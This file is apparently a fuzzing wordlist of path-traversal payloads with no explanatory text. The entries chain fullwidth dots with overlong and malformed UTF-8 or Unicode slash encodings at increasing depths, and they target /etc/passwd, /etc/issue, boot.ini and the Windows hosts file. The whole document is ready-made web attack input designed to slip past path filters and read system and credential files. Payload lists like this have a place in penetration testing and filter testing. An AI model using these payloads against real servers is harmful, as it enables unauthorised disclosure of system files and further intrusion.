-%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5cetc%c0%5cissue -%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5cboot.ini -%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%uff0e%uff0e%c1%9cetc%c1%9cpasswd -%uff0e%uff0e%c1%9cetc%c1%9cissue -%uff0e%uff0e%c1%9cboot.ini -%uff0e%uff0e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9cetc%c1%9cpasswd -%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9cetc%c1%9cissue -%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9cboot.ini -%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9cetc%c1%9cpasswd -%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9cetc%c1%9cissue -%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9cboot.ini -%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9cetc%c1%9cpasswd -%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9cetc%c1%9cissue -%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9cboot.ini -%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9cetc%c1%9cpasswd -%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9cetc%c1%9cissue -%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9cboot.ini -%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9cetc%c1%9cpasswd -%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9cetc%c1%9cissue -%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9cboot.ini -%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9c%uff0e%uff0e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%uff0e%uff0e%c1%pcetc%c1%pcpasswd -%uff0e%uff0e%c1%pcetc%c1%pcissue -%uff0e%uff0e%c1%pcboot.ini -%uff0e%uff0e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pcetc%c1%pcpasswd -%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pcetc%c1%pcissue -%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pcboot.ini -%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pcetc%c1%pcpasswd -%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pcetc%c1%pcissue -%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pcboot.ini -%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pcetc%c1%pcpasswd -%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pcetc%c1%pcissue -%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pcboot.ini -%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pcetc%c1%pcpasswd -%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pcetc%c1%pcissue -%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pcboot.ini -%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pcetc%c1%pcpasswd -%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pcetc%c1%pcissue -%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pcboot.ini -%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pc%uff0e%uff0e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%uff0e%uff0e%c0%9vetc%c0%9vpasswd -%uff0e%uff0e%c0%9vetc%c0%9vissue -%uff0e%uff0e%c0%9vboot.ini -%uff0e%uff0e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9vetc%c0%9vpasswd -%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9vetc%c0%9vissue -%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9vboot.ini -%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9vetc%c0%9vpasswd -%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9vetc%c0%9vissue -%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9vboot.ini -%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9vetc%c0%9vpasswd -%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9vetc%c0%9vissue -%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9vboot.ini -%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9vetc%c0%9vpasswd -%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9vetc%c0%9vissue -%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9vboot.ini -%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9vetc%c0%9vpasswd -%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9vetc%c0%9vissue -%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9vboot.ini -%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9v%uff0e%uff0e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%uff0e%uff0e%c0%qfetc%c0%qfpasswd -%uff0e%uff0e%c0%qfetc%c0%qfissue -%uff0e%uff0e%c0%qfboot.ini -%uff0e%uff0e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qfetc%c0%qfpasswd -%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qfetc%c0%qfissue -%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qfboot.ini -%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qfetc%c0%qfpasswd -%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qfetc%c0%qfissue -%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qfboot.ini -%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qfetc%c0%qfpasswd -%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qfetc%c0%qfissue -%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qfboot.ini -%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qfetc%c0%qfpasswd -%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qfetc%c0%qfissue -%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qfboot.ini -%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qfetc%c0%qfpasswd -%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qfetc%c0%qfissue -%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qfboot.ini -%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qf%uff0e%uff0e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%uff0e%uff0e%c1%8setc%c1%8spasswd -%uff0e%uff0e%c1%8setc%c1%8sissue -%uff0e%uff0e%c1%8sboot.ini -%uff0e%uff0e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8setc%c1%8spasswd -%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8setc%c1%8sissue -%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8sboot.ini -%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8setc%c1%8spasswd -%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8setc%c1%8sissue -%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8sboot.ini -%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8setc%c1%8spasswd -%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8setc%c1%8sissue -%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8sboot.ini -%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8setc%c1%8spasswd -%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8setc%c1%8sissue -%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8sboot.ini -%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8setc%c1%8spasswd -%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8setc%c1%8sissue -%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8sboot.ini -%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8s%uff0e%uff0e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%uff0e%uff0e%c1%1cetc%c1%1cpasswd -%uff0e%uff0e%c1%1cetc%c1%1cissue -%uff0e%uff0e%c1%1cboot.ini -%uff0e%uff0e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1cetc%c1%1cpasswd -%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1cetc%c1%1cissue -%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1cboot.ini -%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1cetc%c1%1cpasswd -%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1cetc%c1%1cissue -%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1cboot.ini -%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1cetc%c1%1cpasswd -%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1cetc%c1%1cissue -%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1cboot.ini -%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1cetc%c1%1cpasswd -%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1cetc%c1%1cissue -%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1cboot.ini -%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1cetc%c1%1cpasswd -%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1cetc%c1%1cissue -%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1cboot.ini -%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1c%uff0e%uff0e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%uff0e%uff0e%c1%afetc%c1%afpasswd -%uff0e%uff0e%c1%afetc%c1%afissue -%uff0e%uff0e%c1%afboot.ini -%uff0e%uff0e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%uff0e%uff0e%c1%af%uff0e%uff0e%c1%afetc%c1%afpasswd -%uff0e%uff0e%c1%af%uff0e%uff0e%c1%afetc%c1%afissue -%uff0e%uff0e%c1%af%uff0e%uff0e%c1%afboot.ini -%uff0e%uff0e%c1%af%uff0e%uff0e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%uff0e%uff0e%c1%af%uff0e%uff0e%c1%af%uff0e%uff0e%c1%afetc%c1%afpasswd -%uff0e%uff0e%c1%af%uff0e%uff0e%c1%af%uff0e%uff0e%c1%afetc%c1%afissue -%uff0e%uff0e%c1%af%uff0e%uff0e%c1%af%uff0e%uff0e%c1%afboot.ini -%uff0e%uff0e%c1%af%uff0e%uff0e%c1%af%uff0e%uff0e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%uff0e%uff0e%c1%af%uff0e%uff0e%c1%af%uff0e%uff0e%c1%af%uff0e%uff0e%c1%afetc%c1%afpasswd -%uff0e%uff0e%c1%af%uff0e%uff0e%c1%af%uff0e%uff0e%c1%af%uff0e%uff0e%c1%afetc%c1%afissue -%uff0e%uff0e%c1%af%uff0e%uff0e%c1%af%uff0e%uff0e%c1%af%uff0e%uff0e%c1%afboot.ini -%uff0e%uff0e%c1%af%uff0e%uff0e%c1%af%uff0e%uff0e%c1%af%uff0e%uff0e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%uff0e%uff0e%c1%af%uff0e%uff0e%c1%af%uff0e%uff0e%c1%af%uff0e%uff0e%c1%af%uff0e%uff0e%c1%afetc%c1%afpasswd -%uff0e%uff0e%c1%af%uff0e%uff0e%c1%af%uff0e%uff0e%c1%af%uff0e%uff0e%c1%af%uff0e%uff0e%c1%afetc%c1%afissue -%uff0e%uff0e%c1%af%uff0e%uff0e%c1%af%uff0e%uff0e%c1%af%uff0e%uff0e%c1%af%uff0e%uff0e%c1%afboot.ini -%uff0e%uff0e%c1%af%uff0e%uff0e%c1%af%uff0e%uff0e%c1%af%uff0e%uff0e%c1%af%uff0e%uff0e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%uff0e%uff0e%c1%af%uff0e%uff0e%c1%af%uff0e%uff0e%c1%af%uff0e%uff0e%c1%af%uff0e%uff0e%c1%af%uff0e%uff0e%c1%afetc%c1%afpasswd -%uff0e%uff0e%c1%af%uff0e%uff0e%c1%af%uff0e%uff0e%c1%af%uff0e%uff0e%c1%af%uff0e%uff0e%c1%af%uff0e%uff0e%c1%afetc%c1%afissue -%uff0e%uff0e%c1%af%uff0e%uff0e%c1%af%uff0e%uff0e%c1%af%uff0e%uff0e%c1%af%uff0e%uff0e%c1%af%uff0e%uff0e%c1%afboot.ini -%uff0e%uff0e%c1%af%uff0e%uff0e%c1%af%uff0e%uff0e%c1%af%uff0e%uff0e%c1%af%uff0e%uff0e%c1%af%uff0e%uff0e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%uff0e%uff0e%bg%qfetc%bg%qfpasswd -%uff0e%uff0e%bg%qfetc%bg%qfissue -%uff0e%uff0e%bg%qfboot.ini -%uff0e%uff0e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qfetc%bg%qfpasswd -%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qfetc%bg%qfissue -%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qfboot.ini -%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qfetc%bg%qfpasswd -%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qfetc%bg%qfissue -%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qfboot.ini -%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qfetc%bg%qfpasswd -%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qfetc%bg%qfissue -%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qfboot.ini -%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qfetc%bg%qfpasswd -%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qfetc%bg%qfissue -%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qfboot.ini -%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qfetc%bg%qfpasswd -%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qfetc%bg%qfissue -%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qfboot.ini -%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qf%uff0e%uff0e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%uff0e%uff0e%u2215etc%u2215passwd -%uff0e%uff0e%u2215etc%u2215issue -%uff0e%uff0e%u2215boot.ini -%uff0e%uff0e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc%u2215passwd -%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc%u2215issue -%uff0e%uff0e%u2215%uff0e%uff0e%u2215boot.ini -%uff0e%uff0e%u2215%uff0e%uff0e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc%u2215passwd -%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc%u2215issue -%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215boot.ini -%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc%u2215passwd -%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc%u2215issue 